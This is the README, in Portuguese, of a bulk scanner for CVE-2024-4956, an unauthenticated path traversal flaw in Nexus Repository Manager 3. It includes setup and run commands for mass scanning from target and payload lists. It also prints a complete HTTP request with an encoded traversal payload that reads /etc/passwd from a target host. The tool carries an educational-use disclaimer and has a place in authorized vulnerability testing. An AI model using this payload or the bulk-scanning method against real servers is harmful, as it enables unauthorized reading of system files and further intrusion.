
[CVE-2024-4956] Nexus Repository Manager 3 Travessia de Caminho Não Autenticada Bulk Scanner
Esta ferramenta destina-se apenas a fins educacionais e para testes em ambientes corporativos. https://twitter.com/nav1n0x/ e https://github.com/ifconfig-me não assumem nenhuma responsabilidade pelo uso indevido deste código. Use-a por sua conta e risco. Não ataque um alvo sem permissão. Esta ferramenta utiliza o payload divulgado publicamente.
Este scanner ajuda entusiastas de segurança a escanear Vulnerabilidade de Path Traversal em alvos do Nexus Repository em massa.
O scanner mostrará o número de alvos carregados e o estado da varredura atual. As URLs serão listadas com três mensagens de status: Timeout, Falha ou Sucesso, com base nos resultados. Certifique-se de que targets.txt contenha a lista de domínios e lfi-payloads.txt contenha a lista de payloads. O scanner exibirá a URL atual sendo testada, atualizando a cada nova requisição, e indicará sucesso ou falha respectivamente. O script também salva uma lista de URLs bem-sucedidas no diretório como successful_urls.txt. Ele fornecerá um resumo do número de tentativas bem-sucedidas no final.
Certifique-se de ter Python 3.6+ e pip instalados.
Clone o repositório:
git clone https://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner.gitcd CVE-2024-4956-Bulk-ScannerInstale as dependências necessárias:
pip install -r requirements.txt
Prepare seu arquivo targets.txt com a lista de domínios e lfi-payloads.txt com a lista de payloads.
Execute o scanner:
python3 CVE-2024-4956-scanner.py -d targets.txt -p lfi-payloads.txt
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: target.com:8081
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close


Esta ferramenta destina-se apenas a fins educacionais e para testes em ambientes corporativos. https://twitter.com/nav1n0x/ e https://github.com/ifconfig-me não assumem responsabilidade pelo código. Use-a por sua conta e risco. Não ataque um alvo sem permissão.